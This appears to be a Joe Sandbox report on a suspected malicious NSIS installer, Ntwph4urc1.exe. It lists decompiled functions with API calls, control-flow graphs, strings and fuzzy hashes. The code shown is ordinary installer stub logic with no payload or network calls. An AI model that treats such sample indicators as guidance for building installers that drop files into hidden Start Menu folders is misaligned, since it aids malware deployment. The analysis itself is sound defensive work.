                                              • FindClose.KERNEL32(00000000), ref: 00406763
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp, xrefs: 0040674C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp
                                              • API String ID: 2295610775-2176574564
                                              • Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                              • Instruction ID: 5230d556015edc92dacd95909e5542708b333c59f405b635cf09ddc887f28092
                                              • Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                              • Instruction Fuzzy Hash: CCD012315192205FC75027386F0C84B7A599F567353264B36F0AAF21E0C6788C3286AC

                                               Control-flow Graph: function at 00403E6B (legend: Executed / Not Executed; graph image not reproduced)
                                              APIs
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA7
                                              • ShowWindow.USER32(?), ref: 00403EC4
                                              • DestroyWindow.USER32 ref: 00403ED8
                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF4
                                              • GetDlgItem.USER32(?,?), ref: 00403F15
                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F29
                                              • IsWindowEnabled.USER32(00000000), ref: 00403F30
                                              • GetDlgItem.USER32(?,00000001), ref: 00403FDE
                                              • GetDlgItem.USER32(?,00000002), ref: 00403FE8
                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00404002
                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404053
                                              • GetDlgItem.USER32(?,00000003), ref: 004040F9
                                              • ShowWindow.USER32(00000000,?), ref: 0040411A
                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040412C
                                              • EnableWindow.USER32(?,?), ref: 00404147
                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040415D
                                              • EnableMenuItem.USER32(00000000), ref: 00404164
                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040417C
                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040418F
                                              • lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004041B9
                                              • SetWindowTextW.USER32(?,007A1F48), ref: 004041CD
                                              • ShowWindow.USER32(?,0000000A), ref: 00404301
                                              Similarity
                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                              • String ID:
                                              • API String ID: 3282139019-0
                                              • Opcode ID: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                              • Instruction ID: fd8a01c06953bfbcdc6c7a7ca4fde1a241a6ed83f8ebcdeac2000881ab9a06ac
                                              • Opcode Fuzzy Hash: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                              • Instruction Fuzzy Hash: 67C1BFB1604604AFDB206F61ED85D2A3B78EBCA705B10853EF651B11F0CB3D9941DB6E

                                               Control-flow Graph: function at 00403ABD (legend: Executed / Not Executed; graph image not reproduced)
                                              APIs
                                                • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                                • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                              • GetUserDefaultUILanguage.KERNELBASE(00000002,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000), ref: 00403AD7
                                                • Part of subcall function 00406335: wsprintfW.USER32 ref: 00406342
                                              • lstrcatW.KERNEL32(1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000), ref: 00403B3E
                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,76233420), ref: 00403BBE
                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403BD1
                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403BDC
                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires), ref: 00403C25
                                              • RegisterClassW.USER32(007A7A00), ref: 00403C62
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7A
                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CAF
                                              • ShowWindow.USER32(00000005,00000000), ref: 00403CE5
                                              • GetClassInfoW.USER32(00000000,RichEdit20W,007A7A00), ref: 00403D11
                                              • GetClassInfoW.USER32(00000000,RichEdit,007A7A00), ref: 00403D1E
                                              • RegisterClassW.USER32(007A7A00), ref: 00403D27
                                              • DialogBoxParamW.USER32(?,00000000,00403E6B,00000000), ref: 00403D46
                                              Strings
                                              Similarity
                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                              • API String ID: 606308-1075850932
                                              • Opcode ID: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                              • Instruction ID: 7ce8ec14a48fa11d69b3a5e1f0875b7083b8d607cd9ed6182ea3b60f82ca9994
                                              • Opcode Fuzzy Hash: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                              • Instruction Fuzzy Hash: 286193702407007ED320AB669D46F2B3A7CEB85B49F40853FF941B22E2DB7D99018B6D

                                               Control-flow Graph: function at 00403015 (legend: Executed / Not Executed; graph image not reproduced)
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00403026
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Ntwph4urc1.exe,00000400,?,00000007,00000009,0000000B), ref: 00403042
                                                • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                                • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                              • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ntwph4urc1.exe,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
                                              • GlobalAlloc.KERNELBASE(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4
                                              Strings
                                              Similarity
                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                              • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Ntwph4urc1.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                              • API String ID: 2803837635-3468640298
                                              • Opcode ID: f652378745d43b93c2f3ffccbc25efe865f8bfd62d9be5f828775b6231d1a4cb
                                              • Instruction ID: b65d07b499067b34cf8ea267e223a71d0fae98adc47698ec1498b1efb03bef53
                                              • Opcode Fuzzy Hash: f652378745d43b93c2f3ffccbc25efe865f8bfd62d9be5f828775b6231d1a4cb
                                              • Instruction Fuzzy Hash: DD51D171900204ABDB119F64DD85B9E7EACEB45316F20843BE911BA2D1DB7C8F418B5D

                                               Control-flow Graph: function at 0040642B (legend: Executed / Not Executed; graph image not reproduced)
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040656C
                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 0040657F
                                              • SHGetSpecialFolderLocation.SHELL32(0040548D,0079A700,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 004065BB
                                              • SHGetPathFromIDListW.SHELL32(0079A700,Call), ref: 004065C9
                                              • CoTaskMemFree.OLE32(0079A700), ref: 004065D4
                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065FA
                                              • lstrlenW.KERNEL32(Call,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 00406652
                                              Strings
                                              Similarity
                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                              • API String ID: 717251189-1230650788
                                              • Opcode ID: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                              • Instruction ID: 6a9894c1754425a34e634a53c322024ca71031740d406166b65bc8419ebad360
                                              • Opcode Fuzzy Hash: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                              • Instruction Fuzzy Hash: A261F471600505ABDF249F24DD40ABE37A5AF51318F22813FE543BA2D4DB3D8AA1CB5E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 783 40176f-401794 call 402d3e call 405d3a 788 401796-40179c call 4063ee 783->788 789 40179e-4017b0 call 4063ee call 405cc3 lstrcatW 783->789 794 4017b5-4017b6 call 40669d 788->794 789->794 798 4017bb-4017bf 794->798 799 4017c1-4017cb call 40674c 798->799 800 4017f2-4017f5 798->800 808 4017dd-4017ef 799->808 809 4017cd-4017db CompareFileTime 799->809 801 4017f7-4017f8 call 405ebf 800->801 802 4017fd-401819 call 405ee4 800->802 801->802 810 40181b-40181e 802->810 811 40188d-4018b6 call 405456 call 40324c 802->811 808->800 809->808 812 401820-40185e call 4063ee * 2 call 40642b call 4063ee call 405a54 810->812 813 40186f-401879 call 405456 810->813 825 4018b8-4018bc 811->825 826 4018be-4018ca SetFileTime 811->826 812->798 845 401864-401865 812->845 823 401882-401888 813->823 828 402bcb 823->828 825->826 827 4018d0-4018db CloseHandle 825->827 826->827 830 4018e1-4018e4 827->830 831 402bc2-402bc5 827->831 833 402bcd-402bd1 828->833 834 4018e6-4018f7 call 40642b lstrcatW 830->834 835 4018f9-4018fc call 40642b 830->835 831->828 842 401901-402390 834->842 835->842 846 402395-40239a 842->846 847 402390 call 405a54 842->847 845->823 848 401867-401868 845->848 846->833 847->846 848->813
                                              APIs
                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,?,00000031), ref: 004017B0
                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,?,00000031), ref: 004017D5
                                                • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                                • Part of subcall function 00405456: lstrlenW.KERNEL32(007A0F28,00000000,0079A700,762323A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                                • Part of subcall function 00405456: lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,762323A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                                • Part of subcall function 00405456: lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,762323A0), ref: 004054B1
                                                • Part of subcall function 00405456: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                                • Part of subcall function 00405456: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                                • Part of subcall function 00405456: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                                • Part of subcall function 00405456: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp$C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call
                                              • API String ID: 1941528284-3763001936
                                              • Opcode ID: 1581b04633949f1bdc692b7a2870eaf759d87e9c25fdc22cdc9577452c9ab1ce
                                              • Instruction ID: cd03b910d30ecf031e582351f340fed2e2266b195dd1fdcb6122cfe31266ec79
                                              • Opcode Fuzzy Hash: 1581b04633949f1bdc692b7a2870eaf759d87e9c25fdc22cdc9577452c9ab1ce
                                              • Instruction Fuzzy Hash: 0B418571510508BACF11BFB5CD85DAE3A79EF45329B20423FF422B11E1DB3C8A519A6E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 849 405456-40546b 850 405471-405482 849->850 851 405522-405526 849->851 852 405484-405488 call 40642b 850->852 853 40548d-405499 lstrlenW 850->853 852->853 855 4054b6-4054ba 853->855 856 40549b-4054ab lstrlenW 853->856 858 4054c9-4054cd 855->858 859 4054bc-4054c3 SetWindowTextW 855->859 856->851 857 4054ad-4054b1 lstrcatW 856->857 857->855 860 405513-405515 858->860 861 4054cf-405511 SendMessageW * 3 858->861 859->858 860->851 862 405517-40551a 860->862 861->860 862->851
                                              APIs
                                              • lstrlenW.KERNEL32(007A0F28,00000000,0079A700,762323A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                              • lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,762323A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                              • lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,762323A0), ref: 004054B1
                                              • SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                              • String ID:
                                              • API String ID: 2531174081-0
                                              • Opcode ID: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                              • Instruction ID: 198c43ce2186877ab3aec1728abe16fb3d15ea5683a6b9ae92d40c5f72e5eea1
                                              • Opcode Fuzzy Hash: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                              • Instruction Fuzzy Hash: EC21AF75900518BACB119F65DD44ACFBFB9EF89354F10802AF904B22A1C3798A81CFA8

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 863 405925-405970 CreateDirectoryW 864 405972-405974 863->864 865 405976-405983 GetLastError 863->865 866 40599d-40599f 864->866 865->866 867 405985-405999 SetFileSecurityW 865->867 867->864 868 40599b GetLastError 867->868 868->866
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405968
                                              • GetLastError.KERNEL32 ref: 0040597C
                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405991
                                              • GetLastError.KERNEL32 ref: 0040599B
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040594B
                                              • C:\Users\user\Desktop, xrefs: 00405925
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                              • API String ID: 3449924974-1229045261
                                              • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                              • Instruction ID: 4c6d3c4ce34384c56ae6b54862a6db5cebbf8231f9905efb0a53c4272bf1951e
                                              • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                              • Instruction Fuzzy Hash: E1011AB1C00219EADF009FA5DD44BEFBBB8EF04314F00803AD544B6190E7789648CFA9

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 869 406773-406793 GetSystemDirectoryW 870 406795 869->870 871 406797-406799 869->871 870->871 872 4067aa-4067ac 871->872 873 40679b-4067a4 871->873 875 4067ad-4067e0 wsprintfW LoadLibraryExW 872->875 873->872 874 4067a6-4067a8 873->874 874->875
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                              • wsprintfW.USER32 ref: 004067C5
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                              • String ID: %s%S.dll$UXTHEME$\
                                              • API String ID: 2200240437-1946221925
                                              • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                              • Instruction ID: 038d7fed81a94acb9f8d17f6b302bf2205b26bc145b48260013954e6d266918a
                                              • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                              • Instruction Fuzzy Hash: 65F0F670510119A7CF14AB64DD0DF9B376CAB40309F10047AA646F20D0EB7C9A68CBA8

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 876 40324c-403263 877 403265 876->877 878 40326c-403275 876->878 877->878 879 403277 878->879 880 40327e-403283 878->880 879->880 881 403293-4032a0 call 403444 880->881 882 403285-40328e call 40345a 880->882 886 403432 881->886 887 4032a6-4032aa 881->887 882->881 888 403434-403435 886->888 889 4032b0-4032d6 GetTickCount 887->889 890 4033dd-4033df 887->890 893 40343d-403441 888->893 894 40343a 889->894 895 4032dc-4032e4 889->895 891 4033e1-4033e4 890->891 892 40341f-403422 890->892 891->894 896 4033e6 891->896 899 403424 892->899 900 403427-403430 call 403444 892->900 894->893 897 4032e6 895->897 898 4032e9-4032f7 call 403444 895->898 902 4033e9-4033ef 896->902 897->898 898->886 910 4032fd-403306 898->910 899->900 900->886 908 403437 900->908 905 4033f1 902->905 906 4033f3-403401 call 403444 902->906 905->906 906->886 913 403403-40340f call 405f96 906->913 908->894 912 40330c-40332c call 40693e 910->912 918 403332-403345 GetTickCount 912->918 919 4033d5-4033d7 912->919 920 403411-40341b 913->920 921 4033d9-4033db 913->921 922 403390-403392 918->922 923 403347-40334f 918->923 919->888 920->902 928 40341d 920->928 921->888 926 403394-403398 922->926 927 4033c9-4033cd 922->927 924 403351-403355 923->924 925 403357-403388 MulDiv wsprintfW call 405456 923->925 924->922 924->925 933 40338d 925->933 930 40339a-4033a1 call 405f96 926->930 931 4033af-4033ba 926->931 927->895 932 4033d3 927->932 928->894 936 4033a6-4033a8 930->936 935 4033bd-4033c1 931->935 932->894 933->922 935->912 937 4033c7 935->937 936->921 938 4033aa-4033ad 936->938 937->894 938->935
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CountTick$wsprintf
                                              • String ID: ... %d%%
                                              • API String ID: 551687249-2449383134
                                              • Opcode ID: 93e44d2671c096b7225e0ed32f8acedc4fb2cb11057b9db1c10a95020cbffac7
                                              • Instruction ID: 008436f450556a42ebae23d461066e9f0811e1f15f23a2ec19415b9062137ceb
                                              • Opcode Fuzzy Hash: 93e44d2671c096b7225e0ed32f8acedc4fb2cb11057b9db1c10a95020cbffac7
